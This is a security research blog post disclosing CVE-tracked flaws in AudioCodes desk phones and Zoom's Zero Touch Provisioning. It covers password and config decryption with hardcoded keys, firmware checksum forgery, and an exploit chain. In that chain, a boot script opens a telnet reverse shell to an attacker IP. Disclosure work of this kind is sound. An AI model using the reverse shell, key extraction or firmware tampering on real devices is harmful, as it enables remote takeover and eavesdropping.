Posts Zero Touch Pwn: Abusing Zoom's Zero Touch Provisioning for Remote Attacks on Desk Phones
Post
Cancel

Zero Touch Pwn: Abusing Zoom's Zero Touch Provisioning for Remote Attacks on Desk Phones

In this blog post, we describe several vulnerabilities that were discovered during a security analysis of AudioCodes desk phones and Zoom’s Zero Touch Provisioning. We also discuss and demonstrate the potential attack scenarios that could arise from these vulnerabilities.

UPDATE (2023-08-18)

UPDATE: The vendor informed us on August 17th, 2023, that the critical vulnerabilities described in this blog post, beside SYSS-2022-055, are fixed and the attacks are no longer possible. An updated post will follow soon.

TL;DR

An external attacker who leverages the vulnerabilities discovered in AudioCodes Ltd.’s desk phones and Zoom’s Zero Touch Provisioning feature can gain full remote control of the devices, potentially allowing the attacker e.g. to:

  • eavesdrop on rooms or phone calls
  • pivot through the devices and attack corporate networks
  • build a bot net of compromised devices

In addition, we were able to analyze and reconstruct cryptographic routines of AudioCodes devices, and to decrypt sensitive information such as passwords and configuration files. Due to improper authentication, a remote attacker is able to access such files and data.

This research was presented at BlackHat USA 2023.

Introduction

In practice, automatic provisioning procedures are widely used for the configuration of new VoIP devices. These procedures ensure that the devices receive all necessary information for operation, such as server addresses, account information, and firmware updates. Furthermore, these procedures allow for efficient central management of the devices after initial provisioning, enabling organizations to easily monitor, troubleshoot and update the devices as needed.

In conventional on-premise VoIP installations, a simple web server is usually deployed within the local network to provide configurations and firmware updates to the devices.

In our experience from penetration testing, the provisioning of devices often poses significant security risks. The chicken-and-egg problem, in which a device needs to query the necessary files with factory settings without any additional information or credentials, can make it challenging to secure the provisioning process. Additionally, the files must be protected against unauthorized access, which can be difficult to achieve.

However, traditional installations typically locate devices and provisioning services in separate and secure network areas, which limits the attack surface and thus the group of potential attackers. But with the rise of cloud communication providers such as Zoom, the situation has changed significantly. These providers have become a fundamental part of daily work life and are gradually replacing traditional VoIP installations.

In certain scenarios, however, a softclient is not enough and hardware such as desk phones or analog gateways are still needed. These can therefore be integrated with most major cloud communication providers today.

But how secure is it to combine traditional devices, with admittedly often improvable security levels, with state-of-the-art cloud-based communication services? In this article, we are going to examine this question based on the example of the Zoom Meeting Platform and AudioCodes devices.

Zoom’s Zero Touch Provisioning

Zoom supports the automatic provisioning of certified hardware which is called “Zero Touch Provisioning”. This allows an IT administrator to assign a device to a user and set configurations which are then queried by a device in the factory settings. This is a very convenient method with a plug-and-play approach.

Based on the wide range of supported devices for ZTP and the amount of seats, Zoom seems to be one of the more relevant providers for integrating traditional devices and therefore a good choice for our security analysis:

Amount of phone seats in Zoom Amount of phone seats in Zoom

How it works

Based on our analysis, Zoom’s ZTP works in the following manner:

  1. A new device can be added inside the Zoom Phone admin panel and a configuration template is assigned
  2. The corresponding vendor redirect service is triggered and informed, that the corresponding device is now assigned to Zoom
  3. A device in its factory settings requests the device configuration from the vendor’s redirect service
  4. The redirect service redirects to Zoom’s ZTP service
  5. The desk phone requests the device configuration from Zoom’s ZTP service
  6. ZTP responds with the assigned configuration template

This mechanism can be illustrated as follows:

Illustration of Zoom ZTP Illustration of Zoom ZTP

Device Authentication

As previously outlined, an assigned phone retrieves its configuration from the Zero Touch Provisioning (ZTP) service at a specific point in time during its initialization process. To examine the communication between the device and ZTP, we initiated several machine-in-the-middle attacks utilizing a Transport Layer Security (TLS) proxy. Through this process, we discovered that certificate-based authentication (also known as mutual TLS) is required and enforced by Zoom:

Mutual-TLS Mutual TLS authentication

Additionally, according to the documentation, we have obtained the base URL of the ZTP service, however, as expected, a client certificate is mandatory:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ curl -v https://provpp.zoom.us/api/v2/pbx/provisioning/audiocodes

[...]
HTTP/2 400
server: nginx
date: Thu, 12 Jan 2023 10:04:25 GMT
content-type: text/html
content-length: 230
strict-transport-security: max-age=31536000; includeSubDomains

<html>
<head><title>400 No required SSL certificate was sent</title></head>
<body>
<center><h1>400 Bad Request</h1></center>
<center>No required SSL certificate was sent</center>
<hr><center>nginx</center>
</body>
</html>

As the next step, we extracted a valid client certificate from a supported device (see device analysis). After configuring the TLS proxy accordingly, we were able to successfully intercept and examine the network communication.

Here is an example request for a device configuration:

1
2
3
GET /api/v2/pbx/provisioning/audiocodes/00908F9D8992.cfg HTTP/2
Host: eu01pbxacp.zoom.us
User-Agent: AUDC/3.4.6.604 AUDC-IPPhone-C450HD_UC_3.4.6.604/1

Response from ZTP:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
HTTP/2 200 OK
Date: Thu, 12 Jan 2023 11:53:09 GMT
Content-Type: application/octet-stream
Content-Length: 6603
X-Zm-Trackingid: PBX_XXXXXXXXXXXXXXXXXXXXXXXXXXX
X-Zm-Region: XX
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
X-Frame-Options: deny
Content-Disposition: attachment; filename=00908F9D8992.cfg
Accept-Ranges: bytes
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff

system/type=C450HD
voip/dns_cache_srv/0/name=_sips._tcp.XXXXXXXXX.XX.zoom.us
voip/dns_cache_srv/0/port=5091
voip/dns_cache_srv/0/priority=1
[...]

Besides the client certificate, the value of the User-Agent header is also verified:

Request:

1
2
3
GET /api/v2/pbx/provisioning/audiocodes/00908F9D8992.cfg HTTP/2
Host: eu01pbxacp.zoom.us
User-Agent: SySS

Response:

1
2
3
HTTP/2 404 Not Found
Content-Length: 0
[...]

Furthermore, depending on the vendor and the device model, the client certificate must have a matching Common Name (CN) attribute or serial number, which corresponds to the MAC address of the device, to retrieve the correct configuration file.

This certificate-based authentication, which verifies the exact match of the MAC address with the requested configuration, makes it difficult for an attacker to access device configurations without possessing the corresponding device certificate.

Device Assignment

Assigning devices can be accomplished in the Zoom Phone’s administrative panel by adding the MAC addresses of the devices:

Assignment of a desk phone Assignment of a desk phone

However, there is no other client-side verification, such as a one-time password or other evidence that the MAC address actually belongs to the organization.

Therefore, an attacker with access to the necessary licenses for using Zoom Phone can claim arbitrary MAC addresses and assign a self-defined configuration template.

Since configuration templates include device settings and instructions, an attacker could potentially trigger actions such as downloading malicious firmware from a server under their control:

Self-defined configuration template Self-defined configuration template

Self-defined configuration template provided assigned phones Self-defined configuration template provided assigned phones

As a result, every time the assigned device is in its factory settings state, such as when it is a new phone or has been reset, it will request the malicious configuration file from ZTP and subsequently download the firmware image provided by the attacker.

An attacker could also leverage another built-in function of Zoom’s ZTP to amplify the scope of this attack by importing a massive list of MAC addresses:

Import of arbitrary devices Import of arbitrary devices

After importing this list of MAC addresses, the devices are belonging to the attacker Zoom account. A new or subsequent assignment, e.g. by the legitimate owner of the device, has no effect on the attacker assignment and the redirection will not be overwritten.

During the security analysis, we did not identify any limitations on the number of devices that can be added.

With the knowledge of this unverified ownership vulnerability, described in SYSS-2022-056, the idea was to find vulnerabilities in the firmware signature verification of supported devices and abuse Zoom’s ZTP to trigger arbitrary devices into installing malicious firmware.

Analysis of Certified Hardware

This section covers the analysis of an AudioCodes C450HD VoIP desk phone, which is listed as supported device for ZTP.

AudioCodes Redirect Service

Before delving into our planned attack scenario, we will further analyze the device provisioning process in regards to the vendor’s redirect service.

As previously explained, a desk phone in its factory settings will initially request a configuration or the provisioning server URL from the corresponding vendor server. This is also the case for AudioCodes devices, which contact the AudioCodes redirect server at redirect.audiocodes.com. This initial provisioning stage is similar to the later stages of provisioning and device configuration with Zoom’s ZTP.

However, unlike Zoom, there is no authentication required to access and query redirect URLs and configurations. In many cases, only the URL of the second-stage provisioning server can be accessed:

Provisioning URL received from vendor's redirect server Provisioning URL received from vendor’s redirect server

However, during our security analysis some spot checks were made, where we found credentials in URLs:

Credentials in redirection URLs Credentials in redirection URLs

In the spot checks, we also followed the redirection pointed to paths of the AudioCodes redirect server itself, where we found sensitive information such as configuration files including passwords:

Sensitive information in redirect server Sensitive information in redirect server

Sensitive data on third-party servers can also be identified during the redirection process.

Therefore, we strongly urge operators of these services and users of the AudioCodes redirect server to check if this data is freely accessible. In general, we recommend enforcing authentication and avoid storing sensitive information such as passwords in plain text.

Due to the device assignment based on the MAC address, it is possible for an attacker to scan the entire AudioCodes MAC address space, greatly increasing the potential impact of this issue.

This exposure of sensitive information to an unauthorized actor is described in SYSS-2022-053.

Password Encryption

During the spot checks on accessing configuration files via the AudioCodes redirect service, we also found Base64-encoded strings which seem to be encrypted passwords:

Base64-encoded and encrypted password Base64-encoded and encrypted password

1
2
3
$ echo "VvlZOp5/5pM=" | base64 -d | xxd

00000000: 56f9 593a 9e7f e693                      V.Y:....

So as a next step, we analyzed the firmware to recover the used encryption routine.

The firmware of AudioCodes devices can be downloaded from the vendor’s download portal and is not encrypted in itself. Another way to access the device file system is via the allowed root access via SSH using the administrator password.

During this analysis, we found out that many functionalities are defined in the shared object file /lib/libaq201.so. This library also imports the function decrypt_string from the shared object file /lib/libac_des3.so, which therefore seems to be a good indicator for the encryption routine.

By disassembling and decompiling this library with tools like Ghidra, the encryption algorithm can be reversed and the hardcoded encryption key extracted:

After some operations, e.g. on the encrypted string, the exported function decrypt_string calls the function des3_crypt:

Calling an encryption function Calling an encryption function

Within the function des3_crypt, a call is made to the functions DES_set_key_unchecked and DES_ede3_cbc_encrypt, which are imported from /lib/libcrypto.so.1.0.0:

3DES functions 3DES functions

These OpenSSL functions first convert the key into the architecture dependent key schedule and then conduct the actual Triple DES decryption.

By knowing the calling convention, we can redefine the given parameters:

Redefining parameters and variables Redefining parameters and variables

Afterwards, the pointers of the 8 byte initialization vector (IV) and the 24 byte cryptographic key can be examined and therefore the memory location inside the binary:

Triple DES initialization vector Triple DES initialization vector

Triple DES key Triple DES key

1
2
3
4
5
6
7
Extraction of the Key:
$ offset=$(python3 -c 'print(int("00000fb8", base=16))')
$ dd skip=$offset count=24 if=libac_des3.so of=key.bin bs=1

Extraction of the IV:
$ offset=$(python3 -c 'print(int("00000fb0", base=16))')
$ dd skip=$offset count=8 if=libac_des3.so of=iv.bin bs=1

Finally, encrypted passwords of AudioCodes devices can be decrypted, for instance by using a simple Python script:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import sys
import base64
from Crypto.Cipher import DES3
from binascii import unhexlify

KEY = unhexlify('604075fb########################################')
IV  = unhexlify('a3a4####35cb####')

def decrypt(ciphertext):
    ciphertext_decoded = base64.b64decode(ciphertext)
    cipher = DES3.new(KEY, DES3.MODE_CBC, iv=IV)
    plaintext = cipher.decrypt(ciphertext_decoded)
    print("plain text password: {}".format(plaintext.decode('utf-8')))


def main():
    decrypt(sys.argv[1])


if __name__ == '__main__':
    main()
1
2
3
$ python3 poc.py VvlZOp5/5pM=

plain text password: system

This use of a hardcoded cryptographic key is described in SYSS-2022-052 (CVE-2023-22957).

Configuration File Encryption

Next we noticed that configuration files for AudioCodes devices could also be stored entirely encrypted:

AudioCodes configuration file encryption AudioCodes documentation for configuration file encryption

However, for the configuration file encryption another encryption key is used and since we do not have the referenced tool encryption_tool.exe, we have to dig further into the device firmware.

Within this analysis, it could be examined that the shared object file /lib/libcgi.so checks whether a configuration file is encrypted or not and executes the following command:

/home/ipphone/bin/decryption_tool -f /tmp/back_file.cfx -o %s > /dev/null

So we assumed that the decryption of the configuration files is handled by /home/ipphone/bin/decryption_tool and therefore decided to have a closer look at this executable.

Doing this, it could be found out that the imported OpenSSL function EVP_des_ede3_cbc is used as cipher and EVP_BytesToKey to derive the key and IV from a given string.

We found an interesting looking string, which is referenced in the function at memory location 00011620:

String for key derivation pushed on the stack String for key derivation pushed on the stack

The instructions above cause the call of memcpy(r0,r1,r2), which can be abstracted as follows:

memcpy(location_on_the_stack, interessting_string, size_of_the_string)

Later in this function, the stack variable which holds the string is copied into register r3, which is then passed as fourth parameter to the function located at memory location 000111a0:

Passing of the string to the function at memory location 000111a0 Passing of the string to the function at memory location 000111a0

Following this function, the string is again stored on the stack (r7):

Storing the string on the stack Storing the string on the stack

Later in the function, r7 is stored in the fourth parameter which is passed to the OpenSSL function EVP_BytesToKey:

Passing the string to the key derivation function Passing the string to the key derivation function

In regard to the OpenSSL documentation of this function, it can be confirmed that this value represents the string from which the key is derived.

So we can extract the secret value from the identified memory location in the previous function 00011620:

Memory location of the secret for key derivation Memory location of the secret for the key derivation

1
2
$ offset=$(python3 -c 'print(int("00001e8f", base=16))')
$ dd skip=$offset count=64 if=decryption_tool of=secret.bin bs=1

Finally, the key is derivable from the extracted secret and encrypted AudioCodes configuration files can successfully be decrypted:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ secret=$(cat secret.bin)

$ openssl enc -des-ede3-cbc -P -pass pass:$secret -nosalt
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
key=40DA61##########################################
iv =C614############

$ openssl enc -d -des-ede3-cbc -pass pass:$secret -nosalt \ 
        -in encrypted_config.cfx -out plain_config.cfg

$ cat plain_config.cfg
voip/line/0/enabled=1
voip/line/0/id=123
voip/line/0/auth_name=XYZ
voip/line/0/auth_password=XYZ

This second use of a hardcoded cryptographic key is described in SYSS-2022-054 (CVE-2023-22956).

Reversing of the Firmware Image Verification

To construct a successful exploit chain that delivers malicious firmware via Zoom’s ZTP and triggers arbitrary devices to install it, we must analyze the firmware update mechanism of AudioCodes devices.

As a first step, we modified a few bits within a firmware image file, which can be downloaded from the vendor’s download portal, and attempted to install it through the device’s web interface.

Unfortunately, the device rejected this attempt:

Failed firmware update

As there seems to be some kind of firmware verification, the corresponding update mechanism has to be analyzed:

The bash script /home/ipphone/scripts/run_ramfs_for_upgrade.sh handles the firmware update process, checks whether the executable /tmp/flasher_ext exists, and executes it. If this file does not exist, flasher located at /bin is executed:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
[...]
FLASHER=flasher
[...]
do_upgrade() {
    v "Performing system upgrade..."
    ln -s /home/ipphone/bin/lcdbar /bin/lcdbar
    flasher u /tmp upgrade.img
    if [ $? -eq 0 ]; then
        v "external flasher exist"
        chmod +x /tmp/flasher_ext
        /tmp/flasher_ext u
        if [ $? -eq 0 ]; then
            v "external flasher can run, so use external flasher to upgrade"
            FLASHER="/tmp/flasher_ext"
        fi
    fi
    $FLASHER r /tmp upgrade.img 1>$CONSOLE 2>&1
    if [ $? -eq 0 ]; then
        v "Upgrade successful"
    else
        v "Upgrade fail"
    fi
}
[...]

By analyzing the flasher executable, the extensive usage of lseek can be discovered. This C function is used to change the file offset for reading and writing specific parts of the firmware image file, which indicates that the image contains different sections.

While looking at the firmware image in a hex editor and further analyzing the binary, we were able to reconstruct the firmware structure and the header which divides the file into several sections and also holds a simple checksum of the section:

Firmware structure

The checksum is calculated by summing up all bytes in the section starting from offset 0x60.

The analyzed firmware image contains of the following sections:

  1. Firmware header containing meta information (version, model, date, etc.)
  2. bootloader.img
  3. rootfs.ext4
  4. phone.img
  5. section.map
  6. flasher
  7. release
  8. end.section

After reconstructing the firmware image structure and the checksum calculation, we again flipped some bits inside the image file, recalculated the checksum, and tried to install it on the device. As expected, this time the firmware update was not aborted and we were able to install the manipulated image file.

To demonstrate this in a more convenient way, we extracted the rootfs.ext4 file system from the image file, mounted it, and created a new file:

Firmware modification

After packing the firmware and recalculating the checksum, we were able to install this manipulated firmware image, too:

Updated section checksum Updated checksum of the rootfs.ext4 section

Successfully installed manipulated firmware image Successfully installed manipulated firmware image

This missing immutable root of trust in hardware is described in SYSS-2022-055 (CVE-2023-22955).

Exploit Chain

Now let’s move on to the exciting part where we take advantage of the unverified ownership and the missing immutable root of trust to develop an exploit chain.

As a simple proof of concept, we added the following script to the path /home/ipphone/scripts, which uses built-in tools (living off the land) to initiate a reverse shell to the attacker server:

1
2
3
4
5
6
#!/bin/sh

/bin/sleep 120
TF=$(/bin/mktemp -u)
/usr/bin/mkfifo $TF
/usr/bin/telnet <ATTACKER-IP> 5000 0<$TF | /bin/sh 1>$TF

The script path is then added to /home/ipphone/rcS which executes it at system start-up.

The manipulated firmware image is then stored on an attacker-controlled server and provided via HTTP. To trigger the target device to download the malicious firmware image, the attacker adds the device’s MAC address to their Zoom account and assigns an evil configuration template that includes instructions to download a new firmware from the attacker-controlled server (see device assignment).

Now, by resetting the device to factory settings, the device goes through the provisioning process of both, AudioCodes and Zoom, and downloads and installs the malicious firmware image from the attacker server.

Finally, a reverse shell with root privileges pops up on the attacker server:

Reverse shell Reverse shell from the targeted device

This exploitation chain can be illustrated as follows:

Complete attack chain Complete attack chain

To provide a more comprehensive proof of concept, we have added additional modifications, for example for eavesdropping:

Eavesdropping attack Eavesdropping attack

Conclusion

During our security analysis, we identified multiple vulnerabilities in Zoom’s and AudioCodes’ provisioning concept as well as in certified hardware.

When combined, these vulnerabilities can be used to remotely take over arbitrary devices. As this attack is highly scalable, it poses a significant security risk:

Attack scenarios Attack scenarios

We have demonstrated that the combination of advanced cloud-based communication solutions like Zoom, along with traditional technologies like VoIP devices, can be a desirable target for attackers.

As future work, other cloud-based solutions and certified hardware could be analyzed for similar security vulnerabilities.

Vulnerability Summary

We initally reported all described vulnerabilities to the vendors in November 2022. Unfortunately, not all vulnerabilities were fixed at the time of the disclosure.

Details about the vulnerabilities and their solution state are provided in the following security advisories:

Product Vulnerability Type SySS ID CVE ID
AudioCodes IP-Phones (UC) Use of Hard-coded Cryptographic Key (CWE-321) SYSS-2022-052 CVE-2023-22957
AudioCodes Provisioning Service Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) SYSS-2022-053 N.A.
AudioCodes IP-Phones (UC) Use of Hard-coded Cryptographic Key (CWE-321) SYSS-2022-054 CVE-2023-22956
AudioCodes IP-Phones (UC) Missing Immutable Root of Trust in Hardware (CWE-1326) SYSS-2022-055 CVE-2023-22955
Zoom Phone System Management Unverified Ownership (CWE-283) SYSS-2022-056 N.A.
This post is licensed under CC BY 4.0 by the author.